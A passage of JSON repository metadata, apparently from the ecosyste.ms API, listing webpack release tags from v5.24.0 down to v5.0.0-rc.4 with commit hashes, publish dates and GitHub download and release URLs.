"https://github.com/webpack/webpack/releases/tag/v5.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0/manifests"},{"name":"v5.23.0","sha":"7774d7ec632e66b8c6a8c0f320b3469e86ed5e26","kind":"tag","published_at":"2021-02-18T15:52:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0/manifests"},{"name":"v5.22.0","sha":"f5bcac4a061897822bf10a8191231b5a71c59273","kind":"tag","published_at":"2021-02-15T09:00:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0/manifests"},{"name":"v5.21.2","sha":"6661bd94fd724bb4610d348a1ffe48030dc56726","kind":"tag","published_at":"2021-02-07T18:27:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2/manifests"},{"name":"v5.21.1","sha":"a1948fb2247adb5121ded5c3c4a04ed384b96c03","kind":"tag","published_at":"2021-02-06T09:39:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1/manifests"},{"name":"v5.21.0","sha":"647aa17cc7fe16d382b3d48efc47258c4e96d699","kind":"tag","published_at":"2021-02-05T21:03:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0/manifests"},{"name":"v5.20.2","sha":"f5a263750611f33adffb7644064b40b0432d6c65","kind":"tag","published_at":"2021-02-04T14:26:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2/manifests"},{"name":"v5.20.1","sha":"82edd9150f8e54bab1497c9c29edc01bc39a88b4","kind":"tag","published_at":"2021-02-03T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1/manifests"},{"name":"v5.20.0","sha":"181e045499c44c9855da56ce38ee5fecbe2998d2","kind":"tag","published_at":"2021-02-02T20:21:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0/manifests"},{"name":"v5.19.0","sha":"3f7573c83ce53a486eff1439ba6fa9143ddbbf0b","kind":"tag","published_at":"2021-01-29T19:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0/manifests"},{"name":"v5.18.0","sha":"16774961d4f9371251c96adf98618675eb032f30","kind":"tag","published_at":"2021-01-26T19:52:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0/manifests"},{"name":"v5.17.0","sha":"d02e8daa267ca094fc0a030a595b000d35a99493","kind":"tag","published_at":"2021-01-22T14:01:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0/manifests"},{"name":"v5.16.0","sha":"56246f0833333a8e277386b16408d8a3eeff553e","kind":"tag","published_at":"2021-01-19T18:39:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0/manifests"},{"name":"v5.15.0","sha":"0a8bf41f169c53c0819f0f320db5957017ac58de","kind":"tag","published_at":"2021-01-15T15:53:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0/manifests"},{"name":"v5.14.0","sha":"f87cafe91c251863cc3dc84ce81b60445f2a780d","kind":"tag","published_at":"2021-01-13T23:52:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0/manifests"},{"name":"v5.13.0","sha":"a694cdfb82b5fd0a5c52102083a267a36446e03e","kind":"tag","published_at":"2021-01-11T22:30:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0/manifests"},{"name":"v4.46.0","sha":"444e59f8a427f94f0064cae6765e5a3c4b78596d","kind":"tag","published_at":"2021-01-11T13:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0/manifests"},{"name":"v5.12.3","sha":"a064b0ff3315db0d95124aaf5cc9b0a6add82926","kind":"tag","published_at":"2021-01-10T18:23:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3/manifests"},{"name":"v5.12.2","sha":"88610d738ff78fa3fb7f859ee284c632bca42a24","kind":"tag","published_at":"2021-01-09T08:27:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2/manifests"},{"name":"v5.12.1","sha":"62ec1546260d168cffd5dec8fc397c6e1159e4e4","kind":"tag","published_at":"2021-01-08T15:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1/manifests"},{"name":"v5.12.0","sha":"74c9c72b873b27ec552cd6b85a9b578d6698e102","kind":"tag","published_at":"2021-01-08T12:58:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0/manifests"},{"name":"v4.45.0","sha":"03313223fd4a0d4e570b8c79971e61b28cb3aeae","kind":"tag","published_at":"2021-01-08T12:53:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0/manifests"},{"name":"v5.11.1","sha":"98bcf44a43d0109ac2680487fddf3c3262395e1f","kind":"tag","published_at":"2020-12-28T18:06:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1/manifests"},{"name":"v5.11.0","sha":"f04328bad933fd9bacea389df17db96ffbd2336b","kind":"tag","published_at":"2020-12-17T15:59:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0/manifests"},{"name":"v5.10.3","sha":"10ad4e95b850bbe20019275fd1d364666c4b69ea","kind":"tag","published_at":"2020-12-15T20:00:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3/manifests"},{"name":"v5.10.2","sha":"c937292e6fb2e1e0a618d9d633f4184ec64cda75","kind":"tag","published_at":"2020-12-15T08:08:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2/manifests"},{"name":"v5.10.1","sha":"3f3d0138f9c18658be87d89d609fc7c6d286005f","kind":"tag","published_at":"2020-12-11T20:32:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1/manifests"},{"name":"v5.10.0","sha":"06e1cce1221ca717fc8efbaeca5ca71246f85a44","kind":"tag","published_at":"2020-12-04T19:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0/manifests"},{"name":"v5.9.0","sha":"0e7437dc3042874649919d4ffe005db13053c4ff","kind":"tag","published_at":"2020-11-28T21:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0/manifests"},{"name":"v5.8.0","sha":"fb7d09b315bbf3b5388eed0cc5e58309187a3acc","kind":"tag","published_at":"2020-11-26T17:58:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0/manifests"},{"name":"v5.7.0","sha":"4ba6d2ea67e9046cbba83f588989b3cadff7d911","kind":"tag","published_at":"2020-11-26T06:08:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0/manifests"},{"name":"v5.6.0","sha":"1936615458352f38ff517d258b936d690a7b631f","kind":"tag","published_at":"2020-11-19T12:18:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0/manifests"},{"name":"v5.5.1","sha":"a6ebce41059a029163a1774b35d81e0bfaa05b27","kind":"tag","published_at":"2020-11-18T12:39:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1/manifests"},{"name":"v5.5.0","sha":"3471c776059ac2d26593ea39f9c47c1874253dbb","kind":"tag","published_at":"2020-11-17T13:23:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0/manifests"},{"name":"v5.4.0","sha":"84dafd164499b6080243cf9d00537b47b6e075c2","kind":"tag","published_at":"2020-11-03T15:28:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0/manifests"},{"name":"v5.3.2","sha":"3df96f4a7843ef07794c31da8c7469dff133a228","kind":"tag","published_at":"2020-10-29T19:52:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2/manifests"},{"name":"v5.3.1","sha":"dfae6f0ac70e1f4ec6d25a853838d4aa58e10e1f","kind":"tag","published_at":"2020-10-28T21:07:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"ab555844701209492debf23cc3168a0efafb3251","kind":"tag","published_at":"2020-10-27T11:52:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0/manifests"},{"name":"v5.2.1","sha":"d09357b4008da750e0d90066b2cd9567edc27a61","kind":"tag","published_at":"2020-10-27T11:02:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"d42705c05dd62d562b759fb518f86c9854435df4","kind":"tag","published_at":"2020-10-22T16:59:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0/manifests"},{"name":"v5.1.3","sha":"c90dfadbc6c5ac1ab4bda2cc106958b65fb5e6e7","kind":"tag","published_at":"2020-10-16T13:36:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3/manifests"},{"name":"v5.1.2","sha":"83790375529c5b2967d45ed40700399e107d478f","kind":"tag","published_at":"2020-10-15T18:41:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2/manifests"},{"name":"v5.1.1","sha":"f2f998b58362d5edc9945a48f8245a3347ad007c","kind":"tag","published_at":"2020-10-15T13:08:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1/manifests"},{"name":"v5.1.0","sha":"77329b4d0e1aa35e26d8a32b2a8968a824b5de9c","kind":"tag","published_at":"2020-10-13T12:37:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"610f36817af1f1c6929786d68f734ac582af1757","kind":"tag","published_at":"2020-10-10T20:07:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0/manifests"},{"name":"v5.0.0-rc.6","sha":"75ecff262ef0c1953e0d13c0b6a06bdad7ccace5","kind":"tag","published_at":"2020-10-10T19:03:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6/manifests"},{"name":"v5.0.0-rc.5","sha":"57b493f6ff0bd55dddfbfc7ffc2f2680a7f82a6d","kind":"tag","published_at":"2020-10-09T22:38:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5/manifests"},{"name":"v5.0.0-rc.4","sha":"1755fe30224943bca80e14634b4cf3f876e529ef","kind":"tag","published_at":"2020-10-07T08:49:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.4","tag_url":"